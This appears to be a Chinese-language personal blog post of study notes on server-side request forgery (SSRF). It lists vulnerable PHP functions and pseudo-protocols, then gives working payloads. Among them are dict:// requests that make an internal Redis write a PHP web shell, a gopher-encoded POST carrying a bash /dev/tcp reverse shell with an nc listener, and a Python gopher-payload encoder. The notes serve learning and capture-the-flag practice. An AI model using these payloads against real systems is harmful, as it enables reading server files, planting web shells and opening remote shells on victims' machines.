<!DOCTYPE html><html lang="zh-cn"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=2"/><meta name="theme-color" content="#222"/><meta http-equiv="X-UA-COMPATIBLE" content="IE=edge,chrome=1"/><meta name="renderer" content="webkit"/><link rel="icon" type="image/ico" sizes="32x32" href="/assets/favicon.ico"/><link rel="apple-touch-icon" sizes="180x180" href="/assets/apple-touch-icon.png"/><link rel="alternate" href="/rss.xml" title="这就是--Potato" type="application/rss+xml"><link rel="alternate" href="/atom.xml" title="这就是--Potato" type="application/atom+xml"><link rel="alternate" type="application/json" title="这就是--Potato" href="https://zhewanyiershinicheng.github.io/feed.json"/><link rel="preconnect" href="https://s4.zstatic.net"/><link rel="preconnect" href="https://at.alicdn.com"/><link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Mulish:400,400italic,700,700italic%7CFredericka%20the%20Great:400,400italic,700,700italic%7CNoto%20Serif%20JP:400,400italic,700,700italic%7CNoto%20Serif%20SC:400,400italic,700,700italic%7CInconsolata:400,400italic,700,700italic&display=swap&subset=latin,latin-ext" media="none" onload="this.media&#x3D;&#39;all&#39;"><link rel="stylesheet" href="/css/app.css?v=0.4.17"><link rel="modulepreload" href="/js/chunk-4WOL5AEA.js"></link><link rel="modulepreload" href="/js/chunk-M2OVB55D.js"></link><link rel="modulepreload" href="/js/chunk-OEHKNEWL.js"></link><link rel="modulepreload" href="/js/copy-tex-JCSSB3EK.js"></link><link rel="modulepreload" href="/js/index.esm-H3NZFZ46.js"></link><link rel="modulepreload" href="/js/post-RFOLAXHH.js"></link><link rel="modulepreload" href="/js/quicklink-LPV2RIEA.js"></link><link rel="modulepreload" href="/js/siteInit.js"></link><link rel="preload" href="6833939bly1gicis3attqj20zk0m8k7l.jpg" as="image" fetchpriority="high"><link rel="preload" href="6833939bly1giciryrr3rj20zk0m8nhk.jpg" as="image" fetchpriority="high"><link rel="preload" href="6833939bly1gicis081o9j20zk0m8dmr.jpg" as="image" fetchpriority="high"><link rel="preload" href="6833939bly1gicitcxhpij20zk0m8hdt.jpg" as="image" fetchpriority="high"><link rel="preload" href="6833939bly1gicit31ffoj20zk0m8naf.jpg" as="image" fetchpriority="high"><link rel="preload" href="6833939bly1giciszlczyj20zk0m816d.jpg" as="image" fetchpriority="high"><meta name="keywords" content="技术"/><meta name="description" content="bug依旧很多，反正我忍不了"/><link rel="canonical" href="https://zhewanyiershinicheng.github.io/2025/04/06/SSRF/"><title>SSRF</title><meta name="generator" content="Hexo 7.3.0"></head><body itemscope itemtype="http://schema.org/WebPage"><div id="loading"><div class="cat"><div class="body"></div><div class="head"><div class="face"></div></div><div class="foot"><div class="tummy-end"></div><div class="bottom"></div><div class="legs left"></div><div class="legs right"></div></div><div class="paw"><div class="hands left"></div><div class="hands right"></div></div></div></div><div id="container"><header id="header" itemscope itemtype="http://schema.org/WPHeader"><div class="inner"><div id="brand"><div class="pjax"><h1 itemprop="name headline">SSRF</h1><div class="meta"><span class="item" title="Created: 2025-04-06 23:02:54"><span class="icon"><i class="ic i-calendar"></i></span><span class="text">Posted on</span><time itemprop="dateCreated datePublished" datetime="2025-04-06T23:02:54+08:00">2025-04-06</time></span><span class="item" title="Symbols count in article"><span class="icon"><i class="ic i-pen"></i></span><span class="text">Symbols count in article</span><span>3.9k</span><span class="text">words</span></span><span class="item" title="Reading time"><span class="icon"><i class="ic i-clock"></i></span><span class="text">Reading time</span><span>4 mins.</span></span></div></div></div><nav id="nav"><div class="inner"><div class="toggle"><div class="lines" aria-label="Toggle navigation bar"><span class="line"></span><span class="line"></span><span class="line"></span></div></div><ul class="menu"><li class="item title"><a href="/" rel="start">chongkai</a></li></ul><ul class="right" id="rightNav"><li class="item theme"><i class="ic i-sun"></i></li><li class="item search"><i class="ic i-search"></i></li></ul></div></nav></div><div class="pjax" id="imgs"><img src="https://7ed.net/bing/api" loading="eager" decoding="async" fetchpriority="high" alt="这就是--Potato"></div></header><div id="waves"><svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z"></path></defs><g class="parallax"><use xlink:href="#gentle-wave" x="48" y="0"></use><use xlink:href="#gentle-wave" x="48" y="3"></use><use xlink:href="#gentle-wave" x="48" y="5"></use><use xlink:href="#gentle-wave" x="48" y="7"></use></g></svg></div><main><div class="inner"><div class="pjax" id="main"><div class="article wrap"><div class="breadcrumb" itemListElement itemscope itemtype="https://schema.org/BreadcrumbList"><i class="ic i-home"></i><span><a href="/">Home</a></span></div><article class="post block" itemscope="itemscope" itemtype="http://schema.org/Article" lang="zh-cn"><link itemprop="mainEntityOfPage" href="https://zhewanyiershinicheng.github.io/2025/04/06/SSRF/"/><span hidden="hidden" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><meta itemprop="image" content="/assets/avatar.jpg"/><meta itemprop="name" content="开船的"/><meta itemprop="description" content="真的假的？, bug依旧很多，反正我忍不了"/></span><span hidden="hidden" itemprop="publisher" itemscope="itemscope" itemtype="http://schema.org/Organization"><meta itemprop="name" content="这就是--Potato"/></span><div class="body md" itemprop="articleBody"><p><img loading="lazy" data-src="1743952653208.png" alt="1743952653208" /></p>
<h2 id="正文"><a class="anchor" href="#正文">#</a> 正文</h2>
<p>可以从 URL 关键字中寻找漏洞</p>
<blockquote>
<p>share   通常表示分享功能<br />
 wap   表示这是针对移动设备优化的版本<br />
 url   通常用于重定向<br />
 link   获取某个东西<br />
 src   就是 src<br />
source   指定数据来源<br />
 target   用于指定表单提交后用于处理的文件<br />
 u	url 的简写<br />
 display	控制图片显示方式<br />
 sourceURL	待下载文件的地址<br />
 imageURL	指定页面显示的图片的地址<br />
 domain	后跟域名</p>
</blockquote>
<p>产生漏洞的函数 PHP<br />
<strong>file_get_contents()</strong></p>
<p>-- 支持 php://input 协议</p>
<p><strong>sockopen()/fsockopen()</strong></p>
<p>-- 这个函数用于获取指定的 url 的数据，文件或者 html。使用 socket 建立 tcp 链接。</p>
<p><strong>curl_exec()</strong></p>
<p>-- 通过 PHP 获取文件 / 数据，下载到 curled 文件夹，附加随机数和 txt 扩展名</p>
<p>-- 默认不跟踪跳转，用于执行指定的 url 对话</p>
<p>伪协议</p>
<blockquote>
<p>file:/// 从文件系统中获取文件内容，如，file:///etc/passwd<br />
dict:// 字典服务器协议，访问字典资源，如，dict:///ip:6739/info：<br />
sftp:// SSH 文件传输协议或安全文件传输协议<br />
 ldap:// 轻量级目录访问协议，或者 ldaps://,Idapi://<br />
tftp:// 简单文件传输协议<br />
 gopher:// 分布式文档传递服务，可使用 gopherus 生成 payload</p>
</blockquote>
<p><strong>fopen()</strong><br />
<strong>readfile()</strong></p>
<p>利用的协议：</p>
<p>不是说一定要用为协议，直接写 url 就等同于访问它.jpg</p>
<p>要求目标服务器可以接收用户指定的 URL 并发起请求</p>
<pre><code>（1）file：在有回显的情况下，利用 file 协议可以读取服务器本地的任意内容
例如：
将file:///etc/passwd作为参数提交给该接口，服务器就会尝试读取 /etc/passwd 文件的内容，并将结果返回给攻击者（如果存在回显）

（2）dict：泄露安装软件版本信息，查看端口，操作内网redis服务等
语法是：
dict://&lt;server&gt;:&lt;port&gt;/&lt;database identifier&gt;/&lt;search query&gt;
一些服务响应dict请求会返回自身信息，所以泄露。也可以用于探测端口是否开放 (只构造到dict://&lt;target_ip&gt;:&lt;port&gt;/)。通常只是为已知漏洞做准备。
但是似乎不能代替file读取普通文件

（3）gopher：gopher支持发出GET、POST请求,可用于反弹shell
语法是：
gopher://&lt;host&gt;:&lt;port&gt;/&lt;selector，也就是执行的操作，格式有很多种&gt;


（4）http/s：探测内网主机存活，也可以用于探测端口是否开放
例如：
构造 http://192.168.1.100:80 这样的 URL 提交给 SSRF 接口，观察服务器的响应来判断 192.168.1.100 的 80 端口是否开放以及是否有 Web 服务在运行。
</code></pre>
<p>更进一步的：</p>
<p>一:dict</p>
<p>Redis 是一个常用的内存数据库，dict 可以模拟 Redisd 协议格式，通过向内网中的 Redis 服务器发送请求，如果该服务器没有访问控制等，可以执行一些 Redis 命令</p>
<p>一个流程</p>
<p>1. 构造  <code>dict://&lt;内网 Redis IP&gt;:6379/INFO</code></p>
<p>返回版本等信息</p>
<p>2. 构造 <code>dict://192.168.1.100:6379/CONFIG%20SET%20dir%20/var/www/html</code></p>
<p>修改数据存储目录</p>
<p>3. 构造 <code>dict://192.168.1.100:6379/SET%20shell.php%20%22%3C?php%20system(%24_GET%5B%27cmd%27%5D);?%3E%22 </code></p>
<p>使用 SET 写入 &lt;?php system ($_GET ['cmd']);?&gt;</p>
<p>4. 构造 <code>dict://192.168.1.100:6379/SAVE</code> , 持久化数据</p>
<p>5. 访问  <code>http://目标网站域名/shell.php?cmd=ls</code> ，</p>
<p>使用刚刚的脚本</p>
<p>这个流程也适用于  <code>gopher</code>  协议请求</p>
<p>但是使用 Redis 命令要前加一个_，最后要以 %0D%0A 结尾</p>
<p>例如保存那个要改为：gopher://&lt;Redis 服务器 IP&gt;:6379/_SAVE%0D%0A</p>
<p>二:gopher</p>
<p><code>gopher</code>  协议反弹 shell：</p>
<p>这是利用已经存在的命令执行漏洞，可以是 web 或者 PHP 上的。</p>
<p>作用是将命令执行的结果返回到你监听的端口处。</p>
<p>例如命令执行漏洞如果在 <code>vulnerable.php</code> ：</p>
<p>先构造一个正常的 POST 请求</p>
<figure class="highlight http"><figcaption data-lang="HTTP"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token request-line"><span class="token method property">POST</span> <span class="token request-target url">/vulnerable.php</span> <span class="token http-version property">HTTP/1.1</span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">&lt;目标主机></span></span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token header"><span class="token header-name keyword">Content-Type</span><span class="token punctuation">:</span> <span class="token header-value">application/x-www-form-urlencoded</span></span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token header"><span class="token header-name keyword">Content-Length</span><span class="token punctuation">:</span> <span class="token header-value">68</span></span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre>cmd=&lt;?php system("bash -i >&amp; /dev/tcp/192.168.1.100/4444 0>&amp;1");?></pre></td></tr></table></figure><p>然后转化为  <code>gopher</code>  协议格式</p>
<blockquote>
<p>将上述 HTTP 请求转换为  <code>gopher</code>  协议的 `` 部分，需要注意以下几点：</p>
<ul>
<li>每个换行符（ <code>\n</code> ）在  <code>gopher</code>  协议中通常用  <code>%0D%0A</code>  表示（ <code>\r\n</code>  的 URL 编码）。</li>
<li>空格用  <code>%20</code>  表示。</li>
<li>特殊字符需要进行 URL 编码。</li>
<li>gopher 的默认端口是 70<br />
 如果发起 post 请求，回车换行需要使用 %0d%0a，如果多个参数，参数之间的 &amp; 也需要进行 URL 编码</li>
</ul>
</blockquote>
<figure class="highlight http"><figcaption data-lang="HTTP"></figcaption><table><tr><td data-num="1"></td><td><pre>这也是在构造复杂请求，你也可以截获请求，然后仿造，或者模拟正常用户。</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token header"><span class="token header-name keyword">URL</span><span class="token punctuation">:</span><span class="token header-value">gopher://&lt;host>:&lt;port>/&lt;gopher-path>_后接TCP数据流</span></span></pre></td></tr><tr><td data-num="3"></td><td><pre></pre></td></tr><tr><td data-num="4"></td><td><pre>转化后：</pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token header"><span class="token header-name keyword">gopher</span><span class="token punctuation">:</span><span class="token header-value">//&lt;目标主机>:80/_POST%20/vulnerable.php%20HTTP/1.1%0D%0AHost:%20&lt;目标主机>%0D%0AContent-Type:%20application/x-www-form-urlencoded%0D%0AContent-Length:%2068%0D%0A%0D%0Acmd%3D%3C%3Fphp%20system(%22bash%20-i%20%3E%26%20/dev/tcp/192.168.1.100/4444%200%3E%261%22);%3F%3E</span></span></pre></td></tr><tr><td data-num="6"></td><td><pre>//其实就是进行两次url编码，但是第一次后要手动将%0A改成%0D%0A</pre></td></tr></table></figure><p>改成 %0D%0A 是为了避免服务器把某些特殊字符混淆成键值对</p>
<p>然后监听下 4444 端口：</p>
<figure class="highlight bash"><figcaption data-lang="bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token function">nc</span> <span class="token parameter variable">-lvp</span> <span class="token number">4444</span>     //这什么玩意儿？？？</pre></td></tr></table></figure><p>这样反向连接成功后，就可以在目标主机上执行命名（起码比一直构造好 php 好了很多）</p>
<p><code>gopher</code>  协议攻击内网服务：</p>
<h2 id="其他"><a class="anchor" href="#其他">#</a> 其他</h2>
<p>脚本编码：</p>
<figure class="highlight python"><figcaption data-lang="python"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">import</span> urllib<span class="token punctuation">.</span>parse</pre></td></tr><tr><td data-num="2"></td><td><pre> </pre></td></tr><tr><td data-num="3"></td><td><pre>payload <span class="token operator">=</span> \</pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token triple-quoted-string string">"""POST /flag.php HTTP/1.1</pre></td></tr><tr><td data-num="5"></td><td><pre>Host: 127.0.0.1</pre></td></tr><tr><td data-num="6"></td><td><pre>Content-Length: 292</pre></td></tr><tr><td data-num="7"></td><td><pre>Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1lYApMMA3NDrr2iY</pre></td></tr><tr><td data-num="8"></td><td><pre>------WebKitFormBoundary1lYApMMA3NDrr2iY</pre></td></tr><tr><td data-num="9"></td><td><pre>Content-Disposition: form-data; name="file"; filename="test.txt"</pre></td></tr><tr><td data-num="10"></td><td><pre>Content-Type: text/plain</pre></td></tr><tr><td data-num="11"></td><td><pre>SSRF Upload</pre></td></tr><tr><td data-num="12"></td><td><pre>------WebKitFormBoundary1lYApMMA3NDrr2iY</pre></td></tr><tr><td data-num="13"></td><td><pre>Content-Disposition: form-data; name="submit"</pre></td></tr><tr><td data-num="14"></td><td><pre>提交</pre></td></tr><tr><td data-num="15"></td><td><pre>------WebKitFormBoundary1lYApMMA3NDrr2iY--"""</span></pre></td></tr><tr><td data-num="16"></td><td><pre> </pre></td></tr><tr><td data-num="17"></td><td><pre><span class="token comment">#注意后面一定要有回车，回车结尾表示 http 请求结束</span></pre></td></tr><tr><td data-num="18"></td><td><pre>tmp <span class="token operator">=</span> urllib<span class="token punctuation">.</span>parse<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="19"></td><td><pre><span class="token comment"># print(tmp)</span></pre></td></tr><tr><td data-num="20"></td><td><pre>new <span class="token operator">=</span> tmp<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">'%0A'</span><span class="token punctuation">,</span><span class="token string">'%0D%0A'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="21"></td><td><pre><span class="token comment"># print(new)</span></pre></td></tr><tr><td data-num="22"></td><td><pre>result <span class="token operator">=</span> <span class="token string">'gopher://127.0.0.1:80/'</span><span class="token operator">+</span><span class="token string">'_'</span><span class="token operator">+</span>new</pre></td></tr><tr><td data-num="23"></td><td><pre>result <span class="token operator">=</span> urllib<span class="token punctuation">.</span>parse<span class="token punctuation">.</span>quote<span class="token punctuation">(</span>result<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="24"></td><td><pre><span class="token keyword">print</span><span class="token punctuation">(</span>result<span class="token punctuation">)</span>       <span class="token comment"># 这里因为是 GET 请求所以要进行两次 url 编码</span></pre></td></tr></table></figure><p>不太会用，还是老老实实找网站编码</p>
<div class="tags"><a href="/tags/%E6%8A%80%E6%9C%AF/" rel="tag"><i class="ic i-tag"></i>技术</a></div></div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">Edited on</span><time title="Modified: 2025-05-19 15:21:48" itemprop="dateModified" datetime="2025-05-19T15:21:48+08:00">2025-05-19</time></span></div><div id="copyright"><ul><li class="author"><strong>Post author: </strong>开船的<i class="ic i-at"><em>@</em></i>这就是--Potato</li><li class="link"><strong>Post link: </strong><a href="https://zhewanyiershinicheng.github.io/2025/04/06/SSRF/" title="SSRF">https://zhewanyiershinicheng.github.io/2025/04/06/SSRF/</a></li><li class="license"><strong>Copyright Notice: </strong>All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> unless stating additionally.</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2025/03/28/docker/" rel="prev" itemprop="url" title="docker" style="background-image: linear-gradient(to bottom right, #9de2f9, #8684d4);"><span class="type">Previous Post</span><h3>docker</h3></a></div><div class="item right"><a href="/2025/04/13/%E6%8C%82%E4%B8%80%E4%B8%AA/" rel="next" itemprop="url" title="挂一个" style="background-image: linear-gradient(to bottom right, #c3ef90, #d8cd88);"><span class="type">Next Post</span><h3>挂一个</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="Contents"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%AD%A3%E6%96%87"><span class="toc-number">1.</span> <span class="toc-text"> 正文</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%85%B6%E4%BB%96"><span class="toc-number">2.</span> <span class="toc-text"> 其他</span></a></li></ol></div><div class="related panel pjax" data-title="Related"></div><div class="overview panel" data-title="Overview"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="开船的" src="/assets/avatar.jpg"/><p class="name" itemprop="name">开船的</p><div class="description" itemprop="description">bug依旧很多，反正我忍不了</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">22</span><span class="name">posts</span></a></div><div class="item categories"><a href="/categories/"><span class="count">3</span><span class="name">categories</span></a></div><div class="item tags"><a href="/tags/"><span class="count">5</span><span class="name">tags</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/zhewanyiershinicheng" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;zhewanyiershinicheng"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>Home</a></li><li class="item dropdown"><a href="#" onclick="return false;"><i class="ic i-feather"></i>Posts</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>Archives</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>Categories</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>Tags</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>Friends</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2025/04/13/%E6%8C%82%E4%B8%80%E4%B8%AA/" rel="prev" title="Previous Post"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2025/03/28/docker/" rel="next" title="Next Post"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>Random Posts</h2><ul><li class="item"><div class="breadcrumb"></div><span><a href="/2025/04/06/SSRF/">SSRF</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF/" title="In技术">技术</a></div><span><a href="/2025/01/22/Linux/">Linux</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF/" title="In技术">技术</a></div><span><a href="/2024/10/14/C%E7%AC%94%E8%AE%B02SE/">C笔记2SE</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%A6%BB%E8%B0%B1/" title="In离谱">离谱</a></div><span><a href="/2024/10/15/%E4%B8%8D%E6%98%AF%EF%BC%8C%E5%BE%AE%E8%BD%AF%EF%BC%8C%E4%BD%A0%E6%9D%A5%E7%9C%9F%E7%9A%84%EF%BC%9F/">不是，微软，你来真的？</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF/" title="In技术">技术</a></div><span><a href="/2024/10/14/HTML/">HTML</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2025/03/28/docker/">docker</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2025/05/25/%E9%9A%8F%E4%BE%BF%E7%9C%8B%E7%9C%8B%E7%9A%84%E9%A2%98%E7%9B%AE/">随便看看的题目</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF/" title="In技术">技术</a></div><span><a href="/2024/10/14/C%E7%AC%94%E8%AE%B01ultrasuper/">C笔记ultra</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF/" title="In技术">技术</a></div><span><a href="/2024/10/11/MySQL/">MySQL</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E5%8F%91%E7%94%B5/" title="In发电">发电</a></div><span><a href="/2024/10/11/Web%E6%96%B9%E5%90%91/">web</a></span></li></ul></div><div class="rpost pjax"><h2>Recent Comments</h2></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2025</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">开船的 @ chongkai</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="Symbols count total">155k words</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="Reading time total">2:21</span></div><div class="powered-by">Powered by <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
        path: `2025/04/06/SSRF/`,
        favicon: {
        show: `(●´3｀●) Here we go again.`,
        hide: `(´Д｀) It's a disaster!`
    },
    search: {
        placeholder: "Search for Posts",
        empty: "We didn't find any results for the search: ${query}",
        stats: "${hits} results found in ${time} ms"
    },
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">Article Timeliness Alert</span><br>This is an article published {{publish}} days ago and last updated {{updated}} days ago. Some information may have changed, so please be careful to screen it.</p></div>`,
    quiz: {
        choice: `Multiple Choice`,
        multiple: `Multiple Answer`,
        true_false: `True/False`,
        essay: `Questions`,
        gap_fill: `Gap Filling`,
        mistake: `Wrong Answer`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://s4.zstatic.net/ajax/libs/pace/1.2.4/pace.min.js" integrity="sha384-k6YtvFUEIuEFBdrLKJ3YAUbBki333tj1CSUisai5Cswsg9wcLNaPzsTHDswp4Az8" crossorigin="anonymous" fetchpriority="high"></script><script src="https://s4.zstatic.net/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha384-ZvpUoO&#x2F;+PpLXR1lu4jmpXWu80pZlYUAfxl5NsBMWOEPSjUn&#x2F;6Z&#x2F;hRTt8+pR6L4N2" crossorigin="anonymous" fetchpriority="high"></script><script src="/js/siteInit.js?v=0.4.17" type="module" fetchpriority="high" defer></script></body></html>